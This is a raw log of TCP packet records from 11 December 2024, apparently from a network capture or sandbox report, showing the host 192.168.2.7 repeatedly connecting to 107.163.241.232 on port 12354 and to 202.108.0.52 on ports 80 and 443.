Dec 11, 2024 16:28:31.036222935 CET	80	51051	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:31.553752899 CET	51048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:31.553905964 CET	51029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:31.553936958 CET	51051	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:31.555330992 CET	51071	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:31.676412106 CET	12354	51071	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:31.676513910 CET	51071	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:31.676639080 CET	51071	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:31.737104893 CET	51084	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:31.738475084 CET	51085	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:31.795964956 CET	12354	51071	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:31.856483936 CET	12354	51084	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:31.856564045 CET	51084	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:31.857953072 CET	80	51085	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:31.858006001 CET	51085	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:31.859164953 CET	51084	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:31.859757900 CET	51085	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:31.978378057 CET	80	51085	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:31.978524923 CET	51085	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:31.978658915 CET	51085	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:31.981457949 CET	12354	51084	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:31.981472969 CET	80	51085	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:32.098419905 CET	80	51085	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:32.098433971 CET	80	51085	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:32.134155989 CET	51106	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:32.253427982 CET	80	51106	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:32.253535032 CET	51106	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:32.253715038 CET	51106	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:32.373636961 CET	80	51106	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:32.373646975 CET	80	51106	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:32.575928926 CET	51124	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:32.700287104 CET	80	51124	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:32.700433969 CET	51124	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:32.700623989 CET	51124	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:32.826082945 CET	80	51124	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:32.826222897 CET	51124	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:32.826273918 CET	80	51124	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:32.826432943 CET	51124	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:32.945580006 CET	80	51124	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:32.945652962 CET	80	51124	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:32.986252069 CET	51142	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:33.105670929 CET	80	51142	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:33.105768919 CET	51142	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:33.106040001 CET	51142	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:33.225321054 CET	80	51142	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:33.225491047 CET	80	51142	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:33.528785944 CET	51153	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:33.648241043 CET	80	51153	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:33.648821115 CET	51153	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:33.860974073 CET	12354	51071	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:33.862365007 CET	51071	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:33.875350952 CET	51153	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:33.877466917 CET	51156	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:33.879354954 CET	51071	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:33.972898006 CET	12354	51084	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:33.972985983 CET	51084	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:33.994748116 CET	80	51153	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:33.997013092 CET	12354	51156	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:33.997097969 CET	51156	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:33.998766899 CET	12354	51071	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.116475105 CET	12354	51156	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.116544008 CET	51156	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.189671040 CET	51084	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.191982031 CET	51156	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.192027092 CET	51156	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.309487104 CET	12354	51084	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.311779976 CET	12354	51156	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.311968088 CET	12354	51156	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.580497980 CET	51164	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.580869913 CET	51165	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.699801922 CET	12354	51164	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.699914932 CET	51164	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.700124025 CET	12354	51165	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.700171947 CET	51165	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.743330956 CET	51164	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.743455887 CET	51165	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.819636106 CET	12354	51164	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.819731951 CET	51164	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.819775105 CET	12354	51165	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.819823027 CET	51165	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.863149881 CET	12354	51164	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.863162994 CET	12354	51165	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.902731895 CET	51164	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.903325081 CET	51168	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.903382063 CET	51165	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:34.938956022 CET	12354	51164	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:34.942044020 CET	12354	51165	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.022279024 CET	12354	51164	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.023756027 CET	12354	51168	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.023829937 CET	51168	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.024197102 CET	51168	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.024358988 CET	12354	51165	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.035851955 CET	51177	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.143373966 CET	12354	51168	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.143970013 CET	12354	51168	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.144444942 CET	51185	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.144817114 CET	51168	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.144817114 CET	51168	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.155448914 CET	12354	51177	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.155565023 CET	51177	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.155750036 CET	51177	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.208256960 CET	80	51153	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:35.208390951 CET	51153	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:35.263784885 CET	12354	51185	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.263866901 CET	51185	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.264064074 CET	51185	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.264255047 CET	12354	51168	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.264266014 CET	12354	51168	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.264810085 CET	51194	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:35.264841080 CET	443	51194	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:35.264913082 CET	51194	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:35.265137911 CET	51194	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:35.265156984 CET	443	51194	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:35.275118113 CET	12354	51177	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.383691072 CET	12354	51185	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.383702040 CET	12354	51185	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.384202957 CET	51202	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.504215956 CET	12354	51202	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.504591942 CET	51202	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.504882097 CET	51202	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.626363039 CET	12354	51202	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.626374960 CET	12354	51202	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.628201962 CET	51216	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.678642035 CET	51177	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.678653002 CET	51194	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:35.748083115 CET	12354	51216	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.748188972 CET	51225	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.748250961 CET	51216	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.790057898 CET	51229	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.792129993 CET	51153	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:35.792164087 CET	51230	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:35.868125916 CET	12354	51225	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.868359089 CET	51225	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.871404886 CET	51225	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.909750938 CET	12354	51229	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.909852028 CET	51229	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.910130024 CET	51229	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.911847115 CET	80	51230	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:35.911967039 CET	51230	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:35.912075043 CET	80	51153	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:35.912133932 CET	51230	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:35.912239075 CET	51153	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:35.987885952 CET	12354	51225	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:35.988123894 CET	51225	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.988123894 CET	51225	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.988519907 CET	51241	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:35.990705967 CET	12354	51225	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:36.029644012 CET	12354	51229	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:36.031785965 CET	80	51230	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:36.031913042 CET	80	51230	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:36.107580900 CET	12354	51225	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:36.107613087 CET	12354	51225	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:36.107933044 CET	12354	51241	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:36.108390093 CET	51241	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:36.108390093 CET	51241	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:36.150424957 CET	51253	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:36.228049040 CET	12354	51241	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:36.228790998 CET	12354	51241	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:36.230252028 CET	51258	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:36.272454023 CET	80	51253	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:36.272583961 CET	51253	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:36.272738934 CET	51253	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:36.354367018 CET	12354	51258	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:36.354432106 CET	51258	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:36.355114937 CET	51258	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:36.396727085 CET	80	51253	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:36.405807018 CET	80	51253	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:36.474545956 CET	12354	51258	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:36.526475906 CET	51273	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:36.649131060 CET	80	51273	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:36.649241924 CET	51273	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:36.649377108 CET	51273	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:36.769867897 CET	80	51273	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:36.770111084 CET	80	51273	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:36.905090094 CET	51296	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:37.024398088 CET	80	51296	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:37.024480104 CET	51296	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:37.031492949 CET	51296	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:37.144212008 CET	80	51296	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:37.144282103 CET	51296	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:37.150831938 CET	80	51296	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:37.236768007 CET	51296	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:37.266309023 CET	80	51296	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:37.359905005 CET	80	51296	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:38.014590979 CET	51301	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:38.019368887 CET	12354	51229	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.019435883 CET	51229	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.079268932 CET	51229	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.079680920 CET	51302	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.133831978 CET	80	51301	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:38.134046078 CET	51301	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:38.173346043 CET	51301	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:38.198487997 CET	12354	51229	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.198905945 CET	12354	51302	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.198992968 CET	51302	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.229068995 CET	51302	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.254007101 CET	80	51301	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:38.254173994 CET	51301	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:38.279145956 CET	51301	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:38.293021917 CET	80	51301	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:38.318873882 CET	12354	51302	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.318922043 CET	51302	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.344049931 CET	51302	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.344585896 CET	51304	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.348424911 CET	12354	51302	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.373703957 CET	80	51301	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:38.398473978 CET	80	51301	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:38.438621044 CET	12354	51302	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.456897974 CET	12354	51258	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.457046986 CET	51258	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.463880062 CET	12354	51302	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.464612961 CET	12354	51304	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.464696884 CET	51304	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.520499945 CET	51258	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.522413015 CET	51304	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.539160967 CET	51306	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:38.539927959 CET	51307	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.640072107 CET	12354	51258	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.642215014 CET	12354	51304	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.658730030 CET	80	51306	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:38.658813953 CET	51306	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:38.659030914 CET	51306	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:38.659723997 CET	12354	51307	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.659779072 CET	51307	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.660151005 CET	51307	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.778359890 CET	80	51306	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:38.779370070 CET	12354	51307	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.779789925 CET	12354	51307	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.803792953 CET	51321	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.924205065 CET	12354	51321	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:38.924268007 CET	51321	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:38.924398899 CET	51321	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.043803930 CET	12354	51321	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:39.043817043 CET	12354	51321	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:39.044449091 CET	51338	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.164196968 CET	12354	51338	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:39.164269924 CET	51338	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.171611071 CET	51338	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.285643101 CET	12354	51338	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:39.285722971 CET	51338	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.285768986 CET	51338	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.286206007 CET	51353	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.291766882 CET	12354	51338	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:39.405179024 CET	12354	51338	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:39.405188084 CET	12354	51338	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:39.406614065 CET	12354	51353	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:39.408252001 CET	51353	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.408366919 CET	51353	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.527777910 CET	12354	51353	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:39.527789116 CET	12354	51353	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:39.528264999 CET	51369	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.649861097 CET	12354	51369	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:39.652291059 CET	51369	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.652414083 CET	51369	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:39.771667004 CET	12354	51369	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:40.236219883 CET	80	51306	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:40.236277103 CET	51306	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:40.274725914 CET	51415	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:40.274755955 CET	443	51415	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:40.274821997 CET	51415	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:40.275285006 CET	51415	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:40.275300026 CET	443	51415	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:40.740276098 CET	12354	51304	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:40.740405083 CET	51304	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:40.740477085 CET	51304	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:40.740838051 CET	51441	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:40.864193916 CET	12354	51304	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:40.864367008 CET	12354	51441	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:40.864483118 CET	51441	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:40.864631891 CET	51441	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:41.040501118 CET	12354	51441	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:41.041002989 CET	12354	51441	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:41.041042089 CET	443	51415	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:41.041096926 CET	51415	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:41.042256117 CET	51461	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:41.042327881 CET	51415	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:41.042346954 CET	443	51415	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:41.042994976 CET	51462	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:41.043023109 CET	443	51462	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:41.043080091 CET	51462	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:41.043507099 CET	51462	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:41.043520927 CET	443	51462	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:41.161495924 CET	12354	51461	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:41.161565065 CET	51461	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:41.166501999 CET	51461	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:41.287425995 CET	12354	51461	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:41.769623041 CET	12354	51369	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:41.769700050 CET	51369	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:41.773917913 CET	51369	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:41.774267912 CET	51499	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:41.893593073 CET	12354	51369	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:41.893919945 CET	12354	51499	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:41.894824982 CET	51499	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:41.896120071 CET	51499	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.014457941 CET	12354	51499	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.014528036 CET	51499	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.014585972 CET	51499	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.015105009 CET	51515	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.015300035 CET	12354	51499	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.133842945 CET	12354	51499	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.133853912 CET	12354	51499	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.134387970 CET	12354	51515	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.134576082 CET	51515	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.135108948 CET	51515	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.254028082 CET	12354	51515	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.254074097 CET	51515	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.254290104 CET	12354	51515	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.254836082 CET	51515	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.254884005 CET	51530	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.373548985 CET	12354	51515	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.374228001 CET	12354	51515	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.374247074 CET	12354	51530	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.374304056 CET	51530	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.376792908 CET	51530	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.494297028 CET	12354	51530	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.494411945 CET	51530	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.494461060 CET	51530	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.495192051 CET	51547	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.496237993 CET	12354	51530	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.522294998 CET	51462	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:42.522295952 CET	51461	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.615114927 CET	12354	51530	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.615151882 CET	12354	51530	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.615654945 CET	12354	51547	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.615870953 CET	51547	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.648401976 CET	51554	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.649677038 CET	51555	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.649961948 CET	51306	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:42.650185108 CET	51556	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:42.768841982 CET	12354	51554	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.768918037 CET	51554	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.769356966 CET	51554	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.770076990 CET	12354	51555	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.770140886 CET	51555	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.770694971 CET	51555	12354	192.168.2.7	107.163.241.232
